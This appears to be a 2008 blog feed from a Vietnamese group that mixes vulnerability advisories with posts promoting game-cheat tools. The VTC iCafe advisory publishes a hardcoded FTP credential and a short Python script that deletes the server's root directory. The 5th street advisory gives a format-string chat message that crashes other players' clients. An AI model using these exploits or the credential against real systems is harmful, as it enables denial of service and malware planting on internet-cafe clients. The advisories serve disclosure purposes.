The 4VN Group

BMSA200808 - Insecure default FTP password in VTC iCafe

bluemood — Tue, 26 Aug 2008 10:01:02 +0000

Title:   Insecure default FTP password in VTC iCafe
Severity:   Critical
Reporter:   Blue Moon Consulting
Products:   VTC iCafe 1.17
Fixed in:   –

Description

VTC iCafe is an internet cafe management application. It uses a hardcoded insecure default FTP password VTCIntecom / VTCIntecom. The FTP server listens on port 6655 and distributes update files to the clients. A malicious user could use this knowledge to a) cause a denial of services on the clients by removing the FTP root directory, or b) place malwares such as virus, trojan on the client by replacing the update files.

Workaround

There is no workaround.

Fix

There is no fix at the moment. Customers are advised to contact the vendor for a proper fix.

Disclosure

Blue Moon Consulting adapts RFPolicy v2.0 in notifying vendors.
Initial vendor contact:

August 12, 2008: Initial contact sent to support.icafe@vtc.vn

Vendor response:

Public disclosure:

August 20, 2008

Exploit code

import ftplib

ftp = ftplib.FTP()
ftp.connect(”localhost”, 6655)
ftp.login(”VTCIntecom”, “VTCIntecom”)
ftp.sendcmd(”RMD \x00″)
ftp.quit()

Disclaimer

The information provided in this advisory is provided “as is” without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.

SROManager for SROVN

bluemood — Thu, 31 Jul 2008 11:41:21 +0000

SROManager is a tool for Silkroad Online Vietnam. (view image for features)

Target: http://www.conduongtolua.com.vn/
Target Version: v1.036

Software version: v1.036p3
By: superkhung

More Information at GameVN Forum: http://forum.gamevn.com/showthread.php?t=484307

Here is screenshot:

Click here to download: (UnRar password is !fuck0ff)


Downloaded a total of 6922 times

Rapidshare Links: http://rapidshare.com/files/133973281/sro.manager.1002010808.rar.html

—-

Silkroad Online (also known as SRO Korean: 실크로드 온라인) is a free massively-multiplayer online role-playing game (MMORPG) created by the South Korean company Joymax, and was released for open beta testing on November 11, 2005. Much of the background of the game is based on the historical Silk Road. Unique from other MMORPGs, the game is centered on a triangular system of trading goods.

Silkroad Online is based on the history of trading in China along the Silk Road, a historical network of trade routes in Asia. The game attempts to reproduce the Silk Road in a much smaller scale, looking realistic and at the same time incorporating fantasy elements such as the use of special magical skills and abilities. One of the game’s most noted features is allowing players to choose three different job roles after their character achieves level 20.

The game currently has a level cap of 100 in the Korean version/Chinese version/Japanese versions, 90 in the Vietnamese version/International version.

The Korean, Chinese, and International version of Silkroad Online have released both the Chinese and European races and classes with a large map that includes both Asian and central European locations, such as Constantinople and Hotan. Different races also have access to different character abilities. On July 24, 2007, Joymax released an expansion of the game entitled “Silkroad Online Legends I, Europe.” The expanded game includes European architecture, characters, clothing, and whole new abilities for European in game race to use.

About 4VN forum

bluemood — Sun, 20 Jul 2008 17:09:10 +0000

After one year of downtime, our forum is up and online again. We are opening for our products discussions, product’s targeting discussions & many open topics.

As of many members’ request, our forum is now open again after being closed for a while. Currently, our forum is still located at www.4vn.org with all the same layout and fucntion. However, 4VN has deleted all the outdated database and started over from the beginning.

Our purpose is to inform our users about the latest activities and create an environment for you to discuss and share information with each other. Besides, we hope to receive many comments and responses about our softwares that will be distributed widely by 4VN.

Please notice:
1. Do not curse, use bad words or insult others
2. Do not post cracked softwares or provide links to keygen/crack/serial
3. Do not participate in or create any topic that relates to religions, politics,or against our traditional customs and cultural practices
4. Do not ask just for the sake of asking
5. Do not try to increase your posting quantity. There is no benefit from that
6. Do not ask to be admin/operator.

Thank you for your incorporation.

Audition Vietnam 6047

bluemood — Wed, 16 Jul 2008 06:53:34 +0000

After VTC Games Online released Auditon Vietnam update 6046, most people couldnt login to game. So they released a next update version 6047.

Affected: members - games - help

– What is Audition –

Audition Online (Korean: 오디션 온라인), also known as Dancin’ Paradise in Japan, is a downloadable multiplayer online casual rhythm game produced by T3 Entertainment. It was originally released in South Korea in 2005, but it has been localized by various publishers around the world including North America which is marketed by Nexon Corporation. Audition Online is free to play but it earns its revenue by selling virtual items such as clothes for the player’s avatar.

Audition’s popularity began in South Korean and Global versions of the game. As popularity increased, more and more users signed up for the South Korean and Global servers. Due to hacking in the Global server, Bugs Corporation discontinued the server and most of the users migrated over to the South Korean servers. As more users joined the South Korean servers, T3 Entertainment and Yedang Online began localizing the game in other regions including China, Hong Kong, Indonesia, Japan, Philippines, North America, Thailand, Taiwan, South East Asia, Vietnam (Local publishers VTC - Game Online), Brazil, United Kingdom, and Remaining European Countries. In the Asian servers, the popularity of Audition has increased rapidly with millions of users on every localized region.

BMSA200807 - Format string vulnerability in 5th street (Hot Step, High Street 5)

bluemood — Mon, 14 Jul 2008 20:36:43 +0000

BLUE MOON SECURITY ADVISORY 2008-07

Title:	Format string vulnerability in 5th street (Hot Step, High Street 5)
Severity:	Critical
Reporter:	Blue Moon Consulting, superkhung
Products:	5th street and derived clients
Fixed in:	–

Description

5th street is a massively multiplayer online dance game produced by Snail Game and distributed in countries such as Malaysia, Singapore and Vietnam under different names High Street 5, Hot Step.

5th street contains a format string vulnerability in its dx8render.dll module. Before a chat message is rendered in a balloon, this message is used as a format string in a call to vsnwprintf function.

This vulnerability allows an attacker to remotely and instantly crash other players’ clients. If carefully exploited, this will also lead to arbitrary code execution on the target machine.

Workaround

There is no workaround.

Fix

Customers are advised to contact your local game distributor in order to obtain a proper fix.

Disclosure

Blue Moon Consulting adapts RFPolicy v2.0 in notifying vendors.

Initial vendor contact:
	June 15, 2008: Initial contact sent to overseas@snailgame.net June 17, 2008: Another request for communication sent to overseas@snailgame.net and local game distributors
Vendor response:
	June 17, 2008: Further communication requested to be sent to James Gaoyu of Snail Game
Further communication:
	June 17, 2008: Technical details and request for estimated time of a patch sent to James Gaoyu June 22, 2008: Request for estimated time of a patch sent to James Gaoyu June 23, 2008: Alert sent to local game distributors
Public disclosure:
	June 25, 2008
Exploit code:	Send a chat message containing `%5000000.x`

Disclaimer

auvn update 7th/2008

bluemood — Fri, 11 Jul 2008 19:00:11 +0000

AUVN has announced they will update to 4046 on 14/07/2008. They will update HShield, so we would take more times to do. Please update your game and wait for next notice.

Here is announcement:

http://au.vtc.vn/noidungtintuc/6542/index.htm

Affected: members - games - help

– What is Audition –

WinMode for Audition

bluemood — Fri, 11 Jul 2008 17:18:16 +0000

Hello,

WinMode makes your game become window. You can chat & play game at the same times. Enjoy!

+ Here is feature:

Window mode

+ Target:

Audition Vietnam
Audition SEA (todo)
Audition NEXON (todo)

It is free for personal use! For commercial use: 100$. Order license? Contact with us. (see about)

here is releases

bluemood — Fri, 11 Jul 2008 14:20:03 +0000

In this page you will find more more more about our products.

Codename 01
Codename 02
Codename 03
Codename x
Codename db

papers store

bluemood — Fri, 11 Jul 2008 14:18:17 +0000

What is papers?

a list of our public documents.
usefull guide for people.
exploit.
codes.

New homepage

bluemood — Fri, 11 Jul 2008 13:37:31 +0000

We are moved to new home. Have a nice weekend!